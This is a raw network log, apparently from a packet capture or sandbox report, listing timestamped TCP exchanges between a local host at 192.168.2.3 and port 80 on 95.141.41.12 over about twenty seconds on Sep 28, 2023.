                                                                                              Sep 28, 2023 06:04:18.066924095 CEST5021780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.170425892 CEST5021780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.170983076 CEST5021980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.364931107 CEST805021995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:18.365034103 CEST5021980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.365281105 CEST5021980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.375915051 CEST805021795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:18.376059055 CEST5021780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.559278011 CEST805021995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:18.564171076 CEST805021995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:18.564488888 CEST5021980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.669624090 CEST5021980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.669986963 CEST5022080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.864240885 CEST805021995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:18.864329100 CEST5021980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.874789953 CEST805022095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:18.874875069 CEST5022080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:18.875067949 CEST5022080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.079687119 CEST805022095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:19.081310034 CEST805022095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:19.081377029 CEST5022080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.185120106 CEST5022080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.185437918 CEST5022280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.390480995 CEST805022095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:19.390556097 CEST805022295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:19.390569925 CEST5022080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.390656948 CEST5022280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.390909910 CEST5022280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.595758915 CEST805022295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:19.598365068 CEST805022295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:19.598572969 CEST5022280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.700865984 CEST5022280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.701344967 CEST5022380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.892236948 CEST805022395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:19.892370939 CEST5022380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.892605066 CEST5022380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:19.906124115 CEST805022295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:19.906358957 CEST5022280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.083538055 CEST805022395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:20.088469028 CEST805022395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:20.088752985 CEST5022380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.201338053 CEST5022380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.201800108 CEST5022480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.392091036 CEST805022395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:20.392294884 CEST5022380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.406371117 CEST805022495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:20.406563044 CEST5022480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.406794071 CEST5022480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.611308098 CEST805022495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:20.616884947 CEST805022495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:20.617069006 CEST5022480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.732181072 CEST5022480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.732569933 CEST5022580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.926613092 CEST805022595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:20.926728010 CEST5022580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.926964998 CEST5022580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:20.936789989 CEST805022495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:20.936954975 CEST5022480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.121109009 CEST805022595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:21.122577906 CEST805022595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:21.122824907 CEST5022580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.232429981 CEST5022580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.232850075 CEST5022780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.417486906 CEST805022795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:21.417848110 CEST5022780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.417965889 CEST5022780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.426429033 CEST805022595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:21.426738977 CEST5022580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.603266001 CEST805022795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:21.607161999 CEST805022795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:21.607279062 CEST5022780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.716763973 CEST5022780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.717093945 CEST5022880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.901633978 CEST805022795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:21.901720047 CEST5022780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.903935909 CEST805022895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:21.904068947 CEST5022880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:21.904254913 CEST5022880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:22.100115061 CEST805022895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:22.692471981 CEST805022895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:22.692693949 CEST5022880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:22.795034885 CEST5022880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:22.795336962 CEST5023080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:22.986649990 CEST805023095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:22.986718893 CEST805022895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:22.986771107 CEST5023080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:22.986953020 CEST5023080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:22.987080097 CEST5022880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:23.174649954 CEST805023095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:23.179414988 CEST805023095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:23.179486036 CEST5023080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:23.294991016 CEST5023080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:23.295432091 CEST5023180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:23.482840061 CEST805023095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:23.483043909 CEST5023080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:23.494873047 CEST805023195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:23.495070934 CEST5023180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:23.495287895 CEST5023180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:23.692045927 CEST805023195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:23.707321882 CEST805023195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:23.707526922 CEST5023180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:23.810383081 CEST5023180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:23.810846090 CEST5023280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:23.997920036 CEST805023295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:23.998013020 CEST5023280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:23.998225927 CEST5023280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.007383108 CEST805023195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:24.007462978 CEST5023180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.185472012 CEST805023295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:24.190782070 CEST805023295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:24.191072941 CEST5023280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.294576883 CEST5023280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.294903040 CEST5023480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.479676008 CEST805023495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:24.479907990 CEST5023480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.480042934 CEST5023480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.481815100 CEST805023295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:24.481997013 CEST5023280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.664002895 CEST805023495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:24.668576002 CEST805023495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:24.668642998 CEST5023480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.779377937 CEST5023480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.779597044 CEST5023580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.963999987 CEST805023495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:24.964257002 CEST5023480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.976454020 CEST805023595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:24.976577044 CEST5023580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:24.976785898 CEST5023580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:25.173376083 CEST805023595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:25.177993059 CEST805023595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:25.178183079 CEST5023580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:25.294347048 CEST5023580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:25.294819117 CEST5023680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:25.493918896 CEST805023695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:25.494119883 CEST5023680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:25.494236946 CEST805023595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:25.494293928 CEST5023580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:25.494373083 CEST5023680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:25.693473101 CEST805023695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:25.698915958 CEST805023695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:25.699173927 CEST5023680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:25.810278893 CEST5023680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:25.810509920 CEST5023880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.004582882 CEST805023895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:26.004798889 CEST5023880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.005068064 CEST5023880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.009998083 CEST805023695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:26.010174990 CEST5023680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.199321985 CEST805023895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:26.204238892 CEST805023895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:26.204560041 CEST5023880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.310262918 CEST5023880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.310750008 CEST5023980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.495419025 CEST805023995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:26.495742083 CEST5023980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.496016026 CEST5023980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.504285097 CEST805023895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:26.504368067 CEST5023880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.680351019 CEST805023995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:26.684571981 CEST805023995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:26.685059071 CEST5023980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.796014071 CEST5023980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.796283007 CEST5024080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.981216908 CEST805023995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:26.981506109 CEST5023980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.993051052 CEST805024095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:26.993221045 CEST5024080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:26.993428946 CEST5024080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:27.190493107 CEST805024095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:27.194561958 CEST805024095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:27.194823027 CEST5024080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:27.310457945 CEST5024080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:27.310784101 CEST5024280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:27.504513025 CEST805024295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:27.504725933 CEST5024280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:27.505019903 CEST5024280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:27.507255077 CEST805024095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:27.507358074 CEST5024080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:27.699057102 CEST805024295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:27.702960014 CEST805024295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:27.703247070 CEST5024280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:27.815815926 CEST5024280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:27.816339016 CEST5024380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.010122061 CEST805024295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:28.010437012 CEST5024280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.013461113 CEST805024395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:28.013664007 CEST5024380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.013804913 CEST5024380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.210751057 CEST805024395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:28.215715885 CEST805024395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:28.215975046 CEST5024380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.325658083 CEST5024380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.325853109 CEST5024480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.520797968 CEST805024495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:28.520927906 CEST5024480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.521122932 CEST5024480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.522880077 CEST805024395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:28.523091078 CEST5024380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.714817047 CEST805024495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:28.719611883 CEST805024495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:28.719831944 CEST5024480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.830568075 CEST5024480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:28.831352949 CEST5024680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.024761915 CEST805024495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:29.024811029 CEST805024695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:29.024929047 CEST5024480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.024971008 CEST5024680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.025191069 CEST5024680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.218697071 CEST805024695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:29.223655939 CEST805024695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:29.223822117 CEST5024680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.325951099 CEST5024680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.326262951 CEST5024780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.513866901 CEST805024795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:29.513972044 CEST5024780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.514373064 CEST5024780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.521214008 CEST805024695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:29.521423101 CEST5024680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.702617884 CEST805024795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:29.707519054 CEST805024795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:29.707794905 CEST5024780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.810030937 CEST5024780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.810395002 CEST5024880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:29.997905016 CEST805024795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:29.998212099 CEST5024780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:30.006611109 CEST805024895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:30.006778955 CEST5024880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:30.006937027 CEST5024880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:30.203190088 CEST805024895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:30.207745075 CEST805024895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:30.207830906 CEST5024880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:30.326066017 CEST5024880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:30.326546907 CEST5025080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:30.517728090 CEST805025095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:30.517895937 CEST5025080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:30.518050909 CEST5025080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:30.522974014 CEST805024895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:30.523036957 CEST5024880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:30.709391117 CEST805025095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:30.714334965 CEST805025095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:30.714529991 CEST5025080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:30.826098919 CEST5025080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:30.826641083 CEST5025180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:31.016983986 CEST805025095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:31.017165899 CEST5025080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:31.032366991 CEST805025195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:31.032506943 CEST5025180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:31.032711029 CEST5025180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:31.239070892 CEST805025195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:31.241245985 CEST805025195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:31.241408110 CEST5025180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:31.357141018 CEST5025180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:31.357383966 CEST5025280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:31.544538021 CEST805025295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:31.544853926 CEST5025280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:31.561804056 CEST5025280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:31.563674927 CEST805025195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:31.563751936 CEST5025180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:31.748863935 CEST805025295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:31.753472090 CEST805025295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:31.753563881 CEST5025280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:32.126846075 CEST5025280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:32.127320051 CEST5025480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:32.314120054 CEST805025295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:32.314237118 CEST5025280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:32.323234081 CEST805025495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:32.323450089 CEST5025480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:32.323548079 CEST5025480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:32.519424915 CEST805025495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:32.521112919 CEST805025495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:32.521271944 CEST5025480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:32.638777018 CEST5025480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:32.639149904 CEST5025580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:32.827060938 CEST805025595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:32.827142000 CEST5025580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:32.827320099 CEST5025580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:32.835369110 CEST805025495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:32.835526943 CEST5025480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.015001059 CEST805025595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:33.020925999 CEST805025595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:33.021229982 CEST5025580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.138331890 CEST5025580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.138704062 CEST5025680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.326519966 CEST805025595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:33.326845884 CEST5025580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.336141109 CEST805025695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:33.336338043 CEST5025680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.336466074 CEST5025680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.534149885 CEST805025695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:33.539525032 CEST805025695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:33.539707899 CEST5025680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.659023046 CEST5025680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.659600973 CEST5025880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.854032040 CEST805025895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:33.854252100 CEST5025880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.854331970 CEST5025880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:33.856323004 CEST805025695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:33.856415987 CEST5025680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.048304081 CEST805025895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:34.052773952 CEST805025895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:34.053039074 CEST5025880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.154021025 CEST5025880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.154445887 CEST5025980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.348438978 CEST805025895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:34.348853111 CEST5025880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.351347923 CEST805025995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:34.351449013 CEST5025980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.351609945 CEST5025980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.549211025 CEST805025995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:34.554755926 CEST805025995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:34.555080891 CEST5025980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.673585892 CEST5025980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.673902988 CEST5026080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.869013071 CEST805026095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:34.869131088 CEST5026080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.869405031 CEST5026080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:34.870615005 CEST805025995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:34.870682001 CEST5025980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:35.064783096 CEST805026095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:35.068875074 CEST805026095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:35.069124937 CEST5026080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:35.185267925 CEST5026080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:35.185790062 CEST5026280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:35.380712032 CEST805026095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:04:35.380969048 CEST5026080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:04:35.382775068 CEST805026295.141.41.12192.168.2.3
